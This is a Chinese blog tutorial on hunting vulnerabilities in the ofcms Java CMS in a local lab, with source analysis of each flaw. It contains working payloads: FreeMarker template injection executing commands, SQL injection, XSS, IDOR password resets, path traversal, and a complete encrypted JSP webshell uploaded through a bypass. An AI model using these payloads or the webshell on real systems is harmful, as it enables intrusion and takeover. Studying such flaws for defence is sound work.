挖了一些phpcms的漏洞了,突然想嘗試去挖一下javacms的漏洞,于是寫下這篇文章來記錄一下自己挖洞的一個流程,希望能幫助到一些正在學習挖洞的師傅們。
前言
挖了一些
phpcms
的漏洞了,突然想嘗試去挖一下
javacms
的漏洞,于是寫下這篇文章來記錄一下自己挖洞的一個流程,希望能幫助到一些正在學習挖洞的師傅們。
确立目标
挖洞的第一步首先是确立一個目标,也就是找個
cms
來挖,這裡可以通過
github
,
gitee
或者谷歌百度直接去搜
cms
。
如果挖洞經驗比較少的話建議找一下star少的cms去挖,找到相應的項目,然後點進去,下載下傳源碼,然後看項目的介紹,大緻了解一下項目的資訊和安裝的過程。
資訊收集
如果确定了目标,接下來我們可以去了解一下他的項目資訊,相應的漏洞等。
項目資訊除了上面的README以為還可以看看issues子產品,這裡可能會有一些系統問題或者安裝問題,後續我們可能會遇到
漏洞資訊的話可以通過
cnvd
或者其他漏洞平台(直接百度也可以)去檢視該系統的漏洞情況。
或者
cnvd
檢視相應的資訊,通過檢視相應的資訊可以提高我們挖洞的效率,我們從中可以知道該項目已經存在漏洞,我們到時候挖就可以看看相應的地方會不會還存在漏洞或者避免挖到别人挖過的漏洞。
環境搭建
上面的資訊收集完之後我們就要開始搭建環境了,搭建環境是很關鍵的一步,由于某些
cms
安裝過程繁瑣或者沒寫好說明,會導緻安裝出現很多問題甚至裝不上,這裡我們要注意項目的文檔,如果實在安裝有問題可以通過相關管道去聯系一下作者或者相應的
qq
群尋求一下幫助。
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “部落格園” 擷取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP用戶端安全檢測指南(安卓+IOS)
本次挖掘的漏洞是
ofcms
,首先先下載下傳一下源碼,然後解壓丢一邊,回到網頁來看一下項目文檔。
環境要求
一般項目都會有寫環境要求的,我們調整一下就好。
環境準備
環境解壓完我們用
idea
打開,如果發現一些重要目錄檔案不見了,重開一下就有了。
資料庫
首先找到
db.properties
,如果不能一眼看到可以通過
ctrl
+
shift
+f來快速搜尋
/ofcms-admin/src/main/resources/dev/conf/db.properties
找到了檔案,通路相對應的路徑即可,這裡我們修改一下資料庫使用者名和密碼,然後點選右邊的資料庫來測試連接配接。
然後按資料庫資訊來修改,然後點選右邊的資料庫,配置一下。
如果出現以下的錯誤
Server returns invalid timezone. Go to 'Advanced' tab and set 'serverTimezone' property manually. 這是時區問題,如果配置了環境變量報錯,可以通過以下步驟來解決。
win+R
cmd
mysql -hlocalhost -uroot -p
(然後輸入資料庫密碼)
show variables like'%time_zone';
set global time_zone = '+8:00';
沒配置環境變量的,看這個文章
https://blog.csdn.net/liuqiker/article/details/102455077
配置成功效果圖如下
maven
右鍵項目找到
mavne
重新附加元件目即可
tomcat
在run-configuration中配置tomcat
在
Deployment
配置一下
一切配置好後點選run啟動就可以了,如果遇到端口報錯改一下端口,其他的報錯就百度一下。
安裝過程
這一步就比較簡單了,跟着弄就好了。
下一步,然後配置好資料庫,這裡記得先在資料庫中建立個
ofcms
的庫,否則會報
Unknown database 'ofcms'
的錯。
在這裡,正常安裝步驟是建立好資料庫,輸入賬号密碼就等待安裝就好。
如果出現以下報錯,我們可以通過手工導入資料庫,這一種情況在安裝别的
cms
也很常見,在安裝遇到資料庫問題我們可以直接導入資料庫。
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE IF EXISTS `of_cms_access`; CREATE TABLE `of_cms_access` ( `access_i' at line 21
資料庫位置
ofcms-master\doc\sql
,選擇相應的版本直接拖進
navicat
中,然後導入成功後重新整理一下就好。
接着将資料庫配置檔案
db-config.properties
檔案名修改為
db.properties
,重新開機一下服務。
漏洞複現
環境搭建完,我們就可以開始挖洞了,然後在這裡我建議是能找到該漏洞已存在的文章,我們就先去複現一下,看看别的師傅們的挖過的漏洞,一方面是防止重複,一方面是可以學習一下别人的挖洞思路。
ofcms
其實存在挺多漏洞的,這裡我們就來簡單複現一下,大緻看看師傅們的挖洞思路。
任意檔案寫入
漏洞模闆檔案這個位置,漏洞的詳細分析可以看看文章
漏洞複現
我們選擇任意一個html,然後點選儲存抓包,我們可以看到包的資訊。
這裡就是寫入檔案,我們在admin目錄下寫入eek1.xml檔案。
通過上面任意檔案讀取漏洞去讀取一下
模闆注入漏洞
漏洞在模闆注入,這個漏洞主要是pom.xml引入了
freemarker-2.3.21
依賴,但是留下一些不安全因素導緻的,具體漏洞分析可以看這篇文章。
漏洞複現
漏洞複現過程比較簡單,我們直接在html檔案中插入payload就可以了
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") }
插入後直要通路前台就會出發payload
模闆注入的知識點可以看看這篇文章
通過這一個洞,我們可以挖洞的時候可以去注意一下pom.xml引入的模闆。
SQL注入漏洞
漏洞分析參考文章,由于這裡的預編譯處理不起作用,是以可以執行SQL語句。
漏洞複現
漏洞點在系統設定---代碼生成---添加----添加表,在這裡抓一下包
直接把payload輸進來
update of_cms_ad set ad_id=updatexml(1,concat(1,user()),1) 任意檔案上傳
漏洞分析在上一篇文章裡有說,這裡主要就是利用windows或中間件檔案上傳特性來避免結尾為
jsp
或
jspx
漏洞複現
找到一個上傳點然後抓包,我這裡是在内容管理----欄目管理----新增----新增使用者----上傳附件這裡抓包的。
eek.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%> 可以看到檔案上傳進去,而且内容沒被修改。
漏洞挖掘
通過上面的内容,我們學習了别的師傅的挖洞思路,接下來就是我自己的挖洞過程了,下面是我挖的幾個洞。
首先除了已經存在的漏洞外,我們要大緻知道什麼漏洞會存在什麼地方,例如登入注冊界面會出現
sql
漏洞,邏輯漏洞等,留言框可能會出現
xss
漏洞,上傳頭像界面可能會出現任意檔案上傳漏洞等,資訊洩露漏洞也可以通過禦劍或者其他工具去掃一下。
XSS漏洞
漏洞複現
對于前台有個客戶案例,選擇其中一個案例,然後有個留言框,這裡直接打入xss的payload就可以了。
<video src=x onerror=alert("eek") /> 漏洞分析
檔案位置
ofcms-master\ofcms-api\src\main\java\com\ofsoft\cms\api\v1
package com.ofsoft.cms.api.v1;
import com.jfinal.plugin.activerecord.Db;
import com.ofsoft.cms.api.ApiBase;
import com.ofsoft.cms.core.annotation.Action;
import com.ofsoft.cms.core.api.ApiMapping;
import com.ofsoft.cms.core.api.RequestMethod;
import com.ofsoft.cms.core.api.check.ParamsCheck;
import com.ofsoft.cms.core.api.check.ParamsCheckType;
import com.ofsoft.cms.core.utils.IpKit;
import java.util.Map;
/**
* 評論接口
*
* @author OF
* @date 2019年2月24日
*/
@Action(path = "/comment")
public class CommentApi extends ApiBase {
/**
* 擷取内容資訊
*/
@ApiMapping(method = RequestMethod.GET)
@ParamsCheck(
{@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"),
@ParamsCheckType(name = "site_id")})
public void save() {
try {
Map params = getParamsMap();
params.put("comment_ip", IpKit.getRealIp(getRequest()));
Db.update(Db.getSqlPara("cms.comment.save", params));
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson();
}
}
} 請求
/api/v1/comment/save.json?comment_content=123&content_id=61&site_id=1&check_status=1&_=1644130926694
這裡直接接受請求,未對content的内容進行檢測,直接将請求的值存入資料庫中,導緻存在跨站腳本漏洞。
邏輯缺陷漏洞1
本地環境
現有兩個使用者資訊,系統管理者admin和普通管理者eek,如下是系統管理者的界面。
admin/admin
eek/123 超級管理者背景界面。
普通管理者背景界面
漏洞複現
我們先以普通管理者登入
點選右上角,修改密碼
在此處burp抓包
修改id為1,密碼任意
修改前admin的密碼是admin
修改後為admin,密碼是eek
漏洞分析
漏洞檔案:
\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java
的
respwd
方法
...
public void respwd() {
Map<String, Object> params = getParamsMap();
String password = (String) params.get("password");
String newpassword = (String) params.get("newpassword");
if (!password.equals(newpassword)) {
rendFailedJson("兩次密碼不一緻!");
return;
}
Record record = new Record();
if (!StringUtils.isBlank(password)) {
password = new Sha256Hash(password).toHex();
record.set("user_password", password);
}
record.set("user_id", params.get("user_id"));
try {
Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson(ErrorCode.get("9999"));
}
}... 在此方法中,背景對前端界面的id和兩次密碼值進行擷取,然後傳入後端,後端直接将id和密碼傳入資料庫中,讓資料庫直接更新資訊。
這裡由于id可控導緻使用者可以直接修改任意id的密碼,導緻該地方存在任意使用者密碼重置。
邏輯缺陷漏洞2
本地環境
資料庫資訊如下圖所示
現在有超級管理者,admin/123
普通管理者,eek/123 漏洞複現
首先以普通管理者身份登入,然後點選右上角,基本資料
在此處burp抓包
修改資訊,user_id改為1,密碼修改為admin
以系統管理者身份登入
成功登入
漏洞分析
漏洞檔案:
\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java
的
update
方法
...
public void update() {
Map<String, Object> params = getParamsMap();
String password = (String) params.get("password");
if (!StringUtils.isBlank(password)) {
password = new Sha256Hash(password).toHex();
params.put("user_password", password);
}
params.remove("password");
String roleId = (String) params.get("role_id");
if (!StringUtils.isBlank(roleId)) {
SqlPara sql = Db.getSqlPara("system.user.role_update", params);
Db.update(sql);
}
params.remove("role_id");
Record record = new Record();
record.setColumns(params);
try {
Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson(ErrorCode.get("9999"));
}
}
... 在此方法中,背景管理直接将新增的資料放到資料庫中,直接對資料庫内容進行更新,未對不合法内容進行檢測,導緻該地方存在任意使用者資訊重置。
任意檔案讀取
漏洞複現
找到模闆檔案
所對應的路徑是
\ofcms-master\ofcms-admin\src\main\webapp\WEB-INF\page\default
,這裡可以通過目錄穿越來讀取任意檔案。
在他的上兩級有個
web.xml
檔案,我們嘗試讀取一些。
這裡不能直接編輯,burp抓個包。
web.xml
檔案如下所示
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://td/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<listener>
<listener-class>org.apache.shiro.web.env.EnvironmentLoaderListener</listener-class>
</listener>
<filter>
<filter-name>shiro</filter-name>
<filter-class>org.apache.shiro.web.servlet.ShiroFilter</filter-class>
</filter>
......... 讀取成功
漏洞分析
漏洞檔案位置:
ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java
漏洞位于該子產品的
getTemplates
方法中
package com.ofsoft.cms.admin.controller.cms;
...
public void getTemplates() {
//目前目錄
String dirName = getPara("dir","");
//上級目錄
String upDirName = getPara("up_dir","/");
//類型區分
String resPath = getPara("res_path");
//檔案目錄
String dir = null;
if(!"/".equals(upDirName)){
dir = upDirName+dirName;
}else{
dir = dirName;
}
File pathFile = null;
if("res".equals(resPath)){
pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir);
}else {
pathFile = new File(SystemUtile.getSiteTemplatePath(),dir);
}
File[] dirs = pathFile.listFiles(new FileFilter() {
@Override
public boolean accept(File file) {
return file.isDirectory();
}
});
if(StringUtils.isBlank (dirName)){
upDirName = upDirName.substring(upDirName.indexOf("/"),upDirName.lastIndexOf("/"));
}
setAttr("up_dir_name",upDirName);
setAttr("up_dir","".equals(dir)?"/":dir);
setAttr("dir_name",dirName.equals("")?SystemUtile.getSiteTemplatePathName():dirName);
setAttr("dirs", dirs);
/*if (dirName != null) {
pathFile = new File(pathFile, dirName);
}*/
File[] files = pathFile.listFiles(new FileFilter() {
@Override
public boolean accept(File file) {
return !file.isDirectory() && (file.getName().endsWith(".html") || file.getName().endsWith(".xml")
|| file.getName().endsWith(".css") || file.getName().endsWith(".js"));
}
});
setAttr("files", files);
String fileName = getPara("file_name", "index.html");
File editFile = null;
if (fileName != null && files != null && files.length > 0) {
for (File f : files) {
if (fileName.equals(f.getName())) {
editFile = f;
break;
}
}
if (editFile == null) {
editFile = files[0];
fileName = editFile.getName();
}
}
setAttr("file_name", fileName);
if (editFile != null) {
String fileContent = FileUtils.readString(editFile);
if (fileContent != null) {
fileContent = fileContent.replace("<", "<").replace(">", ">");
setAttr("file_content", fileContent);
setAttr("file_path", editFile);
}
}
if("res".equals(resPath)) {
render("/admin/cms/template/resource.html");
}else{
render("/admin/cms/template/index.html");
}
}
...... 這裡沒有對dir和dir_name的值進行不合法輸入檢測,導緻這裡可以進行目錄穿越,然後後面的就隻有對檔案是否存在進行判斷,若存在則讀取。是以此處存在任意檔案讀取漏洞。
聲明:本文僅限于技術讨論與分享,嚴禁用于非法途徑。若讀者是以作出任何危害網絡安全行為後果自負,與本号及原作者無關。
更多靶場實驗練習、網安學習資料,請點選這裡>>
搜尋
複制
合天智彙:合天網絡靶場、網安實戰虛拟環境